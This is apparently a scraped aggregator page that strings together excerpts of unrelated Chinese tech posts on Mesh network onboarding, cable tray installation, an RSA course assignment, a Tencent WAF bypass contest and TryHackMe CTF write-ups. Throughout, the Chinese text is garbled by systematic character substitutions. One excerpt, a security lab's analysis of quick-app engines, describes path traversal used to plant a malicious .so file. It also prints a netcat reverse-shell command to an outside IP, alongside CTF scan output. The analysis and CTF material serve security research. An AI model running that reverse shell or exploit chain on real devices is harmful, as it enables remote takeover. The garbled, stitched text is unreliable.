2、Agent角色:Mesh网络的执行者,通过承受Controller的控制指令来执行工作,并向Controller反馈执行后果 这里的角色并不针对具体的设施,是逻辑实体,一个设施既能够作为Controller也能够作为Agent,或者同时作为Contrller和Agent。 Mesh网络构建过程整个Mesh网络构建过程分为如下2步: 1、Onboarding2、Discovery和Configuration Onboarding过程Onboarding过程是帮忙一个未退出Mesh网络的设施退出Mesh网络,咱们将未退出网络的设施称为Enrollee设施,整个过程是通过1905 Push Button Configueration协定(前面简称1905 PBC)来实现的,1905 PBC蕴含了如下3个个性: 1、个性1:入网单方须要进行push button 2、个性2:基于WiFi Protected Setup实现 3、个性3:基于TLV 从图 3中可看出,1905 PBC在Multi-AP Extension局部进行了专门的标记,也就是标记获取的是Backhaul的SSID。因而Entollee设施可通过1905 PBC来取得Mesh链路的入网凭证。 图 3 Multi-AP Extension 整个Onboarding的流程如图 4所示:图 4 Onboarding流程 首先将两个设施进行Push Button,让两个设施进入配网状态。 其次Enrollee设施通过1905 PBC来与Fronthaul SSID交互,通过M1-M8的过程后,最终Existing Agent将Backhual的SSID和password返回给Enrollee设施,之后Enrollee设施便可能连贯Backhaul SSID,退出Mesh网络。 ...

November 17, 2021 · 2 min · jiezi

关于安全:安防工程中电缆桥架的施工要求及设计规范

一、施工要求 1、直钢电缆桥架长度超过30m,铝合金或玻璃钢电缆桥架长度超过15m。 应提供膨胀节。 跨接伸缩缝应设置弥补安装,可采纳带伸缩缝的桥梁。 2、桥梁与支座之间的螺栓,桥梁连贯板上的螺栓没有缺失。 螺母位于桥的外侧。 铝合金桥架与钢支架固定时,有互相绝缘和电化学措施,避免侵蚀。 个别可垫石棉垫。 3、在竖井中穿过不同防火区的桥梁应按设计要求安排,并有防火隔离措施。 电缆桥架敷设在电井内时,可用角钢固定。4.电缆桥架穿过防火墙和消防楼层时,应采取防火隔离措施,避免火势沿路线蔓延;防火隔墙和板应配合土建预留洞口,并在洞口预埋边缘角钢。施工时,依据铺设层数和电缆,采纳L50×50×5角钢作为固定架,固定架焊接在边缘角钢上。也能够在土建施工中砌筑或浇筑混凝土时,先制作框架,装置在墙、板中。 二、电缆敷设 电缆的建设该当合乎工程建设的相干规范。 1.电缆应在a端和b端方向对立,并按a端和b端顺次连贯。 2.直埋区域电缆标记的埋设应合乎相干规范。 3.电缆余量应合乎以下要求: 电缆每端余量不得小于2m,50m以下的分支电缆可不作余量。 室外电缆进入室内的余量不得小于5m。 电缆接续点每端电缆留足一次接续的余量。 三、桥架接地 当设计容许利用桥架零碎形成接地支线电路时,桥架的接地应合乎下列要求: 从金属电缆槽引入或引出的金属电缆导管及其支架必须牢靠接地(PE)或接地(PEN),并必须合乎下列标准: 1.金属电缆桥架及其支架的总长度应至多有两根接地(PE)或接零(PEN)支线,这样整个桥架就是一条电气通路。 2.非镀锌电缆盘之间的连贯两端连贯铜芯接地线,接地线的最小容许截面积不小于4mm2。 3.镀锌电缆盘之间的连贯板两端无需跨接接地线,但连贯板两端有不少于两个带锁紧螺母或止回垫圈的连贯固定螺栓。 4.室外电缆余量应合乎以下要求: 电缆每端余量不得小于2m,50m以下的分支电缆可不作余量。 室外电缆进入室内的余量不得小于5m。 电缆接续点每端电缆留足一次接续的余量。 四、电缆防护 1.从电缆槽引出的袒露电缆和从电缆槽到路基区方向盒的电缆应装备与方向盒爱护管成一体的爱护套管。爱护套管应天然蜿蜒,并满足电缆蜿蜒半径的要求。 2.在桥架地基外表铺设防水层时,方向电缆箱与信号设施之间的分支电缆应采纳钢管爱护。 3.穿过电源电缆时,信号电缆应受到爱护。 4.电缆桥须要高低桥的固定和爱护应合乎下列要求: 桥墩高低桥的电缆采纳钢槽爱护,公开钢槽埋深不小于500mm,地上钢槽采纳砖桩爱护,砖桩高度不小于2000mm。 固定在箱梁上的电缆槽与固定在桥墩上的电缆槽之间有5毫米至10毫米的间隙。 箱梁与桥墩上的电缆槽平缓连贯,其蜿蜒半径满足电缆蜿蜒半径要求。 四、支、吊架装置 1.支架和吊架的钢筋应平直,无显著扭曲。下料后,长度偏差应在3毫米以内,切口处不应有卷边或毛刺; 2.钢支吊架应焊接牢固,无显著变形。焊接前,厚度大于4毫米的支架和铁件应倒角,焊缝应平均润滑,焊缝长度应符合要求,不得有裂纹、咬边、气孔、凹痕和漏焊等缺点。 3.支架和吊架应装置牢固,确保程度和垂直。装置在有坡度建筑物上的支吊架应与建筑物的坡度和角度统一; 4.禁止焊接和切割钢结构或轻钢龙骨的任何局部; 5.衣架的规格不应小于30 mm× 3 mm扁钢;角钢25mm×25mm×3mm;;; 6.通用吊索应该是一个定型产品,有本人独立的吊装夹具或撑持零碎。 7.固定支架之间的间隔个别不应大于1.5 ~ 2 m,进出口接线盒、箱、柜、角、弯、变形缝两端及丁字接头三端各500mm范畴内设置固定支架。 官网:http://www.jisucx.com 公众号:极速佳

November 17, 2021 · 1 min · jiezi

关于安全:潜藏在手机中的新威胁免安装应用安全指北

1. 背景简介随着5G时代降临,互联网信息爆炸式增长,挪动利用逐步变得体积宏大且性能简单。一方面一般消费者会越来越少地去下载客户端,绝大多数需要须要以更轻量化的形式失去满足,另一方面,每一个超级APP或手机厂商都想生态化的汇聚更多内容。由此,“快利用”一类的免装置利用应运而生。 往年,OPPO子午实验室在Black Hat Asia黑帽大会上分享了针对免装置利用的钻研与剖析成绩,如何从一般接口调用到利用权限的近程命令执行,咱们将在本篇文章中进行更为详尽的剖析。 BlackHat是由传奇黑客Jeff Moss于1997年开办的全球性网络安全大会,被誉为黑客世界的“奥斯卡”,每年别离在美国、欧洲、亚洲各举办一场,作为寰球信息安全行业的顶级盛会,自诞生以来每年都吸引了寰球泛滥企业、政府机构和顶级平安厂商、钻研组织的关注和参加。 2. 架构简介免装置利用架构多样,但从整体上看能够分为挪动操作系统厂商与平台型利用厂商两种不同的派别。 挪动操作系统厂商国外以谷歌、苹果为代表的操作系统厂商充分利用作为平台的劣势,也不便开发者疾速上手,将传统的Android与iOS利用模块化,构造、开发语言要求等均不变,利用能够依据理论状况按需加载,极大水平上缩减了用户的应用等待时间,进而实现”免装置“的成果。谷歌InstantApp与苹果AppleClips对于安卓和iOS来说更多是一个“长期利用”的角色,因而操作系统会对其可拜访的数据、权限有所限度。比方iOS中,AppleClips不能和其余利用自在的替换数据,只能与本人对应的残缺利用(full-app)进行数据共享;AppleClips不能进行后盾服务,也不能拜访通讯录、文件治理、短信等用户敏感数据,甚至连告诉都会在申请8小时之后主动撤销。 平台型利用厂商平台型利用厂商以国内的为显著代表,诸如国内九大安卓手机厂商所创立的快利用平台、微信、支付宝等。此类平台型利用充沛排汇了传统H5利用的劣势,并将其与挪动利用的JS-Bridge相结合。快利用/小程序引擎实际上与浏览器的多过程架构十分相似,将咱们的Web前端利用打包之后运行在引擎之上,不同快利用/小程序运行在不同的过程中,互不烦扰。引擎作为中间人,一方面承当着快利用/小程序代码解释器,另一方面也是快利用/小程序与操作系统内核、底层硬件沟通的双向桥梁。 3. 攻击面解析对于谷歌InstantApp与苹果AppleClips的攻击方式篇幅限度,不在此赘述。下文次要剖析国内用户更常应用的快利用/小程序的攻击面。 如下图架构纵览所示,业务服务端、引擎服务端、引擎、原生Android/iOS利用、操作系统与底层硬件五者之间存在着诸多数据交互过程,而引擎又好像是架设在Android/iOS之上的微型OS,撑持并治理快利用/小程序生态失常运行。 3.1 从利用下载启动流程看在包下载的过程中,存在两条攻打门路,如果厂商未应用严格的HTTPS传输,攻击者可在下载过程替换数据,将歹意内容回传给客户端;另外如果厂商将包长期下载到手机的内部存储,歹意利用也能够抓住这个机会进行替换,当然这也依赖于引擎未对包做文件校验。 3.2 从引擎提供接口看无论是小程序还是快利用都提供了许多调用零碎或者底层硬件的接口,从拍照录音到操作文件系统,泛滥的接口暗藏着微小的安全隐患。总体能够归为如下几类:1) 传感器或硬件调用类:电量、蓝牙、NFC、屏幕、键盘、减速计、罗盘等 针对此类不蕴含用户敏感数据的接口,咱们须要关注的便是受权,快利用/小程序是否能够不通过受权调用接口能力或一次受权永恒受权; 2) 文件系统: 创立文件/目录、下载文件、上传文件、删除文件/目录、解压文件等文件系统间接与Android/iOS操作系统交互,具备很高的危险,须要关注的点较多,如下: 受权,快利用/小程序须要取得用户受权能力调用接口读写文件系统;可操作文件系统范畴,快利用/小程序可操作的根目录是否被限度在公有目录下的一个具体目录内;接口是否判断了目录穿梭符号../,下载文件接口或解压接口是否穿梭目录跳出可操作文件系统范畴;接口在底层可能调用了C++函数或零碎函数,是否可能注入歹意字符串执行命令或删除不可期的目录文件。3) 平台特色:实名认证、广告、利用下载、卡券、红包、账号体系、领取等。 此类与服务端交互的接口更多的是业务逻辑破绽,咱们须要关注这些接口是否在客户端实现校验,哪怕是整个校验流程中的一步,都有可能造成微小危害。 实名认证、领取等接口,客户端验证可能绕过儿童模式管制或付费体系,实现本地破解; 广告、利用下载等计费接口,快利用/小程序是否绕过计费或刷量; 4) 操作系统调用:相机、录音、利用跳转、数据存储、告诉、WebView、剪贴板、联系人、日历等。 操作系统调用波及用户敏感信息,除了上述的受权之外,咱们须要关注: 接口是否在后盾继续运行,比方录音,拍照;WebView是否关上任意URL,并携带身份信息字段;利用跳转范畴是否可控,反对哪些协定;数据存储的地位是否平安,其余快利用/小程序或者原生利用是否篡改;3.3 从引擎底层看引擎本身由逻辑代码JavaScript解析引擎、WebView组件、图片音视频解码组件、JS to C++/Swift/ObjcC零碎调用库等组成。 1)咱们首先说说JS引擎,不同平台不同厂商应用的JS引擎各不相同,但总归是基于V8或者JavaScriptCore,快利用/小程序引擎首先将JS文件预处理、结构化,再交由JS引擎进行优化执行。 小程序快利用AndroidX5内核/UC内核V8引擎iOSJavaScriptCore---也就是说如果咱们在小程序/快利用的逻辑代码层也就是小程序的js文件、快利用的ux文件中插入V8/JSC的破绽利用代码,期待引擎进行解析执行便可造成文件读写甚至命令执行,当然具体成果这也取决于不同厂商在对JS引擎破绽缓解措施。 2)图片音视频解码组件 名称组件是否有历史CVE破绽音频MediaBrowserCompat、FFmpeg...未知JPG/JPEGlibjpeg-turbo、...存在视频Mediacodec、libstagefright、FFmpeg...存在快利用/小程序反对多种图片格式解析、音视频播放、live直播等,除了依赖操作系统底层的组件外,本身可能嵌入了很多自定义动态链接库,而很多动态链接库比方libjpeg-turbo、FFmpeg都是存在历史CVE破绽了,而对这些库的Fuzz也是比拟不便的,因而这是快利用/小程序引擎的一个潜在攻击面。 4. 从目录穿梭到近程命令执行咱们在第二章节提到过,文件系统是引擎提供的权限很高的接口,稍不慎便可造成命令执行等,于是咱们便从此既定目标登程,看看在快利用中是否实现目录穿梭。 快利用实现了较多的文件读写操作API,比方: access(object)appendFile(object)mkdir(object)readFile(object)rename(object)readdir(object)...如果要实现近程攻打,则咱们须要从网络上向受害者设施下载写入文件,自然而然,咱们首先尝试应用其中某接口穿梭到lib-main写入动态链接库lib-xxx.so通过真机测试,咱们胜利写入了歹意的so文件加载库:那为什么咱们要向这个目录写入so文件呢?那咱们须要提到一个货色——Facebook SoLoader。 SoLoader是facebook推出的一个So文件加载库,它封装了System.loadLibrary并且可能解决So文件的依赖。 当React Native利用第一次启动时,SoLoader会在/data/data/package_name下创立一个lib-main文件夹并依据规定提取apk中的So文件到其中。 如此咱们便可让引擎加载咱们歹意的so文件加载库,达到本地命令执行的成果: shell.so 执行 => system("/system/bin/toybox nc 192.168.1.153 1233 | /system/bin/sh &");但要实现近程命令执行还远远不够,受害者须要关上指标快利用,并二次重启快利用引擎。咱们晓得快利用反对二维码、deeplink、NFC等形式关上利用,于是整个破绽利用链如下:只须要用户点击hap scheme链接或者接触NFC设施,咱们便可实现近程命令执行。 5. 总结与瞻望本文提到的免装置利用攻击面与破绽利用形式或者只是冰山一角,但免装置利用是挪动利用的的将来发展趋势,跨平台的个性,不仅在手机终端宽泛应用,也开始搭载在新能源汽车的车机系统之中,或者当前还可能在工控、医疗、穿戴设施上看到它的身影,它的破绽潜在威力切实不容小觑。 6. 援用链接[1] https://www.infoq.cn/article/...[2] https://github.com/facebook/S... 作者简介 Zhiyang OPPO子午平安实验室网络安全工程师 OPPO子午平安实验室成立于2019年,以“爱护用户的平安与隐衷,为品牌注入平安基因”为使命,继续关注业务平安、红蓝反抗、AIoT平安、Android平安、数据和隐衷爱护等畛域,深耕平安攻防钻研及研发体系平安建设。 ...

November 16, 2021 · 1 min · jiezi

关于安全:CSE-13S密码分析

Assignment 6Public Key CryptographyCSE 13S – Fall 2021First DESIGN.pdf draft due: November 11th at 11:59 pm PSTAssignment due: November 21st at 11:59 pm PST1 IntroductionDoo Jdxo lv glylghg lqwr wkuhh sduwv, rqh ri zklfk wkh Ehojdh lqkdelw, wkhDtxlwdql dqrwkhu, wkrvh zkr lq wkhlu rzq odqjxdjh duh fdoohg Fhowv, lq rxu Jdxov,wkh wklug.—Julius CæsarCryptography, once restricted to government, spies, and the military is now pervasive in our lives. Mostweb sites that you visit are protected using SSL. Your SSH connections are protected in the same way.How is this accomplished? Through a mixture of public key and symmetric key cryptography. Theearliest known practical public-key cryptography algorithm is RSA, after its inventors Ronald Rivest, AdiShamir, and Leonard Adleman (Figure 2), who published it in 1978. About five years earlier, on 20 November,1973, Clifford Cocks (Figure 1), working for GCHQ (the British equivalent of the NSA), invented a verysimilar algorithm. His classified memorandum “A note on ‘non-secret’ encryption” was to remain secretfor 24 years. In fact, when you read the Cocks memorandum, you will see that the idea of public key encryptionwas proposed by J. H. Ellis three years earlier in 1970. Unknown in the public literature, the ideawas independently proposed by Ralph Merkle for public key distribution, which inspired asymmetriccryptography by Whitfield Diffie and Martin Hellman, and finally leading to RSA.Public-key cryptography, or asymmetric cryptography, is a cryptographic system that uses pairs ofkeys: public keys (known to others) and private keys (known only by the owner). The generation of suchkey pairs depends on cryptographic algorithms that are based on mathematical objects called one-wayfunctions. Security requires keeping the private key private; the public key can be distributed widely.Any person can encrypt a message using the intended receiver’s public key, but that encrypted messagecan only be decrypted with the receiver’s private key. This allows a server to create a cryptographickey for suitable symmetric-key cryptography and then use a client’s openly shared public key to encryptthe newly generated symmetric key. The server can then send this encrypted symmetric key over aninsecure channel to the client; only the client can decrypt it using its private key. With the client andserver both having the same symmetric key, they can safely use symmetric key encryption to communicate.This scheme has the advantage of not having to pre-share symmetric keys while gaining the higherspeed of symmetric-key cryptography.Symmetric-key algorithms use the same cryptographic keys for the encryption of plaintext and thedecryption of ciphertext. The keys may be identical, or there may be a simple transformation between© 2021 Darrell Long 1the two keys. The keys represent a shared secret between two or more parties. The requirement thatboth parties have access to the secret key is one of the main disadvantages of symmetric-key encryptioncompared to public-key encryption.Let’s briefly look at the Cocks algorithm before moving on to the more popular RSA algorithm. Wehave two principals: Alice (A), who is the receiver, and Bonnie (B), who is the sender.(a) Alice:i. Chooses two primes p and q such that p - (q−1) and q - (p−1). That is, p does not divideq−1 and q does not divide p−1.ii. Transmits the computed product n = pq to the sender, which we write as An−→ B.(b) Bonnie:i. Has a message consisting of numbers c1,c2,...,cr where 0 < ci < n. ...

November 13, 2021 · 12 min · jiezi

关于安全:TPSA2147-奖励升级腾讯云WAF安全挑战赛2天冲刺倒计时

倒计时2天!!!截至11月12日18:00 腾讯云WAF平安挑战赛邀你冲顶! 自11月1日挑战赛揭幕以来,有数白帽子响应号召参加挑战,为咱们提交高质量的绕过。感激各位徒弟们! 首周完结,do9gy徒弟以优异的体现,荣居第一周周榜首! do9gy徒弟感言刚刚得悉本人第一周积分排名第一,纯属幸运。2014年就加入过TSRC组织的WAF挑战赛,从那时开始就感觉本人对WAF攻防反抗十分感兴趣,这种绕过十分有挑战性。欢送大家一起来参加。 借助这个机会,祝贺门神能力输入到云上。我以一个服役选手的身份为门神奉献最初一点力量,也衷心希望腾讯云WAF产品越来越弱小。 谁将最终怀才不遇,篡夺总榜冠军宝座? 赛事倒计时冲刺之际,为感激各方白帽徒弟们的倾情参加,TSRC再次郑重宣布一个好消息—— 挑战赛的处分规范,降级了!!!降级的处分规范如下——1、 SQL注入破绽点评分标准绕过WAF防护,读取到 information_schema.tables 表内的数据信息或数据库内的 flag 信息;提交绕过 payload 并简要形容绕过思路,即可取得5积分,345平安币(等同于1725人民币)的破绽赏金: 2、 XSS破绽利用评分标准:(1)绕过WAF防护,能够在 Chrome/firefox 浏览器最新 Stable 版本下执行 alert/confirm/prompt 弹窗函数;提交绕过 payload 并简要形容绕过思路,即可取得3积分,54平安币(等同于270人民币)的破绽赏金; (2) 绕过WAF防护,能够在 Chrome/firefox 浏览器最新 Stable 版本下结构 payload 读取 cookie 并发送到第三方域站点;提交绕过 payload 并简要形容绕过思路,即可取得4积分,72平安币(等同于360人民币)的破绽赏金。 之前提交的所有绕过,依照上述规范对立执行。实物处分规范,放弃不变 1、排名规定:按破绽所取得的平安币排序,高>低;平安币雷同,破绽数量高>低;破绽数量雷同,按第一个破绽提交工夫,早>晚。2、以上处分均较量完结后对立结算 挑战赛工夫2021年11月1日10:00 - 2021年11月12日18:00 挑战环境1、PHP + MySQLhttp://demo1.qcloudwaf.com/sq...http://demo1.qcloudwaf.com/xs... 2、JSP + Oraclehttp://demo2.qcloudwaf.com/sq...http://demo2.qcloudwaf.com/xs... 3、ASP.NET + SQL Serverhttp://demo3.qcloudwaf.com/sq...http://demo3.qcloudwaf.com/xs... 破绽报告规范1、破绽报告内容必须蕴含残缺Payload,要害Payload和简要绕过思路三个局部;2、破绽题目必须以“[云WAF挑战赛]”结尾;3、残缺Payload的定义为:“若要害Payload在Get申请中,可仅提供残缺URL以供复现;若要害Payload在POST或HEADER申请参数中,需提供残缺申请包以供复现”。 提交形式1、 请将合乎评分标准和规定的报告提交到TSRC (https://security.tencent.com/...);2、破绽题目必须以“[云WAF挑战赛]”结尾,先到先得。 附:测试标准1、如同时有多个选手提交了反复的绕过计划,以最先提交的选手为准,先到先得(不同的Payload如思路雷同将视为同一种绕过计划);2、禁止入侵靶场机,在靶场机上执行命令,歹意下载靶场机文件3、禁止利用web站点之外的破绽,如操作系统,数据库exp4、禁止长时间影响零碎性能暴力发包扫描测试5、禁止应用对别人无害的代码(如蠕虫/获取别人敏感信息的操作等)6、只对提供的破绽参数点进行绕过测试获取指定信息即可,禁止测试其余破绽7、不可与其余测试选手共享思路,不得擅自公开绕过技巧和payload8、请勿扰乱其余测试选手进行测试,不要毁坏主机环境9、若一类绕过手法和原理用于多个靶场,该手法会被断定为同种绕过,如一种绕过通杀3个靶场,那么会按一个无效绕过断定10、若Payload在浏览器环境或交互性等方面存在肯定限度条件,影响Payload的理论危害,将可能酌情缩小处分 腾讯云WAF平安挑战赛冲刺倒计时!各方白帽齐聚精干,奋起争霸各显神通独特守护腾讯云WAF平安最初2天,JOIN US!

November 10, 2021 · 1 min · jiezi

关于安全:TryhackmeKoTH-Food-CTF前端验证绕过图片隐写SUID提权vimbasic

免责申明本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责。服务发现┌──(rootkali)-[~/tryhackme/FoodCTF]└─# nmap -sV -Pn 10.10.2.134 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-09 03:09 ESTNmap scan report for 10.10.2.134Host is up (0.30s latency).Not shown: 997 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)3306/tcp open mysql MySQL 5.7.29-0ubuntu0.18.04.19999/tcp open abyss?疾速扫描,连个web服务都没有,却有mysql服务,狐疑在高端口存在http,全端口扫描一下: ┌──(rootkali)-[~/tryhackme/FoodCTF]└─# nmap -sV -Pn 10.10.2.134 -p-Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-09 03:11 ESTStats: 0:14:59 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth ScanSYN Stealth Scan Timing: About 66.78% done; ETC: 03:34 (0:07:26 remaining)Stats: 0:22:02 elapsed; 0 hosts completed (1 up), 1 undergoing Service ScanService scan Timing: About 50.00% done; ETC: 03:34 (0:00:32 remaining)Nmap scan report for 10.10.2.134Host is up (0.30s latency).Not shown: 65529 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)3306/tcp open mysql MySQL 5.7.29-0ubuntu0.18.04.19999/tcp open abyss?15065/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)16109/tcp open unknown46969/tcp open telnet Linux telnetd果然在15065端口存在一个golang的http服务,关上页面只显示两行文字: ...

November 10, 2021 · 6 min · jiezi

关于安全:TryhackmeMustacchioxxe攻击修改PATHSUID提权

免责申明本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责。服务发现┌──(rootkali)-[~/tryhackme/Mustacchio]└─# nmap -sV -Pn 10.10.7.89 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-08 01:33 ESTNmap scan report for 10.10.7.89Host is up (0.34s latency).Not shown: 998 filtered portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)80/tcp open http Apache httpd 2.4.18 ((Ubuntu))Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 45.25 seconds看上去只开启了两个服务 ...

November 8, 2021 · 3 min · jiezi

关于安全:干货收藏|腾讯安全在数字生态大会最重磅内容集锦

明天,2021腾讯数字生态大会已圆满闭幕。 围绕“数实交融”“数字时代的平安底座”“平安共建”等议题,以及网络安全行业中的技术演进、能力落地、行业利用摸索等命题,腾讯平安带来了许许多多的新产品、新计划、新思考,并颁布了“一起,保卫美妙”新愿景……精彩十足,亮点多多。 意犹未尽?笔速不够没记残缺?想要跟敌人分享? 别放心,咱们整顿了腾讯平安在大会期间的“高光内容”,一起来回顾吧! 新趋势两份平安白皮书洞察产业互联网新态势 《2021勒索攻打趋势剖析白皮书》腾讯平安联结腾讯研究院、中国信息安全策略研究院、中国产业互联网联盟独特公布,围绕勒索攻打态势、演进门路及特色开展了重点剖析,并具体梳理了勒索攻打七大发展趋势,同时从平安前沿技术、安全意识及寰球通力合作方面对防备勒索攻打提出了倡议和思考。白皮书认为,防备勒索攻打的重点应在事先进攻环节,而不是遭逢攻打后的解密环节。从技术层面来讲,可通过聚焦云原生平安、零信赖等平安前沿技术,保障云平台和云上业务平安。《2021游戏平安白皮书》整合了腾讯游戏平安在攻防实际中积攒的大量网络攻击数据,对以后游戏行业面临的平安挑战、现状特点以及危险趋势进行梳理,从端手游外挂、打金工作室、内容风控、DDoS攻打等不同维度,揭示以后游戏行业面临的平安威逼,全面解读游戏网络安全发展趋势,为游戏行业网络安全实际提供参考。新技术三大翻新解决方案帮忙企业加强平安治理效力 交融协同区块链零碎解决方案面向产业区块链间数据交换、业务协同等场景需要,提供跨链数据共享、联结溯源、广域存证多种能力,无效解决目前底层架构互通难、数据结构互认难、接口协议互联难、平安机制互信难的外围痛点,促成政务、税务、公安、司法、版权、溯源、金融等多样性产业区块链之间的协同利用。数字身份管控平台围绕企业数字化转型中的全生命周期身份信息管理、多状态利用与服务平安对接及简单网络环境下的平安边界等问题,数字身份管控平台通过面向内部客户的CIAM和面向外部员工的EIAM两种工具,为企业提供面向用户及外部治理的身份、利用、网络交融对立的智能网关整体化解决方案。目前,数字身份管控平台在全国10多个国家部委,30个省份,10多个行业,近200个我的项目利用,累计撑持10亿+的用户拜访。云原生数据安全解决方案腾讯云拜访平安代理CASB采纳免利用开发革新的配置形式,提供事先敏感数据发现、分类分级;事中加密存储、动静脱敏;预先平安审计的一体化数据安全解决方案,具备一站式数据安全、字段级平安管控、平安能力轻量化、利用和数据库无需革新四大劣势,助力企业解决在进行数据合规和治理时,在数据的传输、存储和应用环节,面临的数据治理艰难、数据安全施行简单、老本低等问题。新指引两大平安全景图构建企业业务与平安协同成长新模式 腾讯业务平安全景图当风控成为企业经营的最大危险和不确定性因素,危险的感知和处理能力成为企业应答业务平安危险的基本。腾讯平安首次公布业务平安全景图,基于底层技术和自研风控能力的打磨,将风控能力通过PaaS和SaaS等形式便捷化输入,在综合利用多种AI技术的根底上,打造四大AI风控能力,造成笼罩“辨认、感知、决策、经营”等流程的闭环。目前已深刻银行、保险、电商、批发、交通出行、广告、传媒等十五大行业实现落地利用。腾讯云平安产品体系全景图为了助力企业更好地应答云平安危险,腾讯平安公布升级版云平安产品体系全景图,从云原生网络安全、云原生计算平安、云原生利用平安、云原生数据安全、云原生平安治理五大层面输入腾讯平安云上平安能力包,构筑一体化全方位的云原生平安进攻解决方案,并助力各行各业解决多元化云上场景的防护需要,更好地激发云技术在企业数字化降级过程中的价值。新引擎两大平安打算开释腾讯平安能力激发产业新增长 腾讯版权保护打算面向网络版权产业,腾讯版权保护打算将凋谢腾讯区块链技术,建设反对全品类作品全流程服务(查重、确权、监测、拦挡、诉讼、交易)的一站式区块链版权服务平台,为湖北十万中小微企业提供千万级次版权保护普惠服务,推动版权产业内容、商业、行业生态优化,推动数字文化内容生态的高质量倒退。腾讯小程序平安打算扎根于小程序场景,腾讯小程序平安打算将为用户提供四位一体的平安服务,包含平安诊断、平安产品服务、平安专家线下问诊以及标杆权利,从技术防护、性能晋升、营销场景、合规监管、售后服务等五大板块帮忙企业建设小程序平安防火墙,筑牢基础设施底座,打造私域加速度。新生态安心生态联盟翻启生态合作助农兴农产业互联网时代,各方都是平安生态构建的参与者。腾讯平安联结北方乡投、北京炎数、青岛腾元、北京爱创、天时团体等搭档,独特成立安心生态联盟,多方将携手独特致力于推动农村数字化、农产品标准化、产品特色化、身份标识化等工作,为溯源生态构建提供更多实际及规范指引,将“安心”的数字能量贯通于品牌成长乃至行业倒退的每一步。 看完这些还不够?咱们还为您精心筹备了一份“平安”大礼包!想要全方位理解大会内容,可扫描下方二维码,或者关注“腾讯平安”公众号,回复“干货”,获取腾讯平安的干货集锦。

November 8, 2021 · 1 min · jiezi

关于安全:TryhackmeColddBox-Easywordpress登录爆破SUID提权find

免责申明本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责。服务探测┌──(rootkali)-[~/tryhackme/ColddBox]└─# nmap -sV -Pn 10.10.165.236Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-06 08:22 EDTStats: 0:01:28 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth ScanNmap scan report for 10.10.165.236Host is up (0.31s latency).Not shown: 999 closed portsPORT STATE SERVICE VERSION80/tcp open http Apache httpd 2.4.18 ((Ubuntu))Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 101.75 seconds只有一个http服务,关上80端口首页是一个经典的wordpress站点 ...

November 6, 2021 · 5 min · jiezi

关于安全:TryhackmeSmag-Grottowiresharksudo滥用aptget

免责申明本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责。服务发现┌──(rootkali)-[~]└─# nmap -sV -Pn 10.10.10.105Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-06 05:19 EDTNmap scan report for 10.10.10.105Host is up (0.32s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)80/tcp open http Apache httpd 2.4.18 ((Ubuntu))Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 17.30 seconds经典CTF,一个ssh一个http ...

November 6, 2021 · 3 min · jiezi

关于安全:TryhackmeStartupwireshark数据报分析cron任务提权

免责申明本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责。服务扫描rootkali)-[~]└─# nmap -sV -Pn 10.10.171.61 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-06 02:51 EDTNmap scan report for 10.10.171.61Host is up (0.32s latency).Not shown: 997 closed portsPORT STATE SERVICE VERSION21/tcp open ftp vsftpd 3.0.322/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)80/tcp open http Apache httpd 2.4.18 ((Ubuntu))Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 55.61 seconds开启了ftp,ssh,http服务 ...

November 6, 2021 · 4 min · jiezi

关于安全:TryhackmeLianYu图片隐写sudo-滥用pkexec

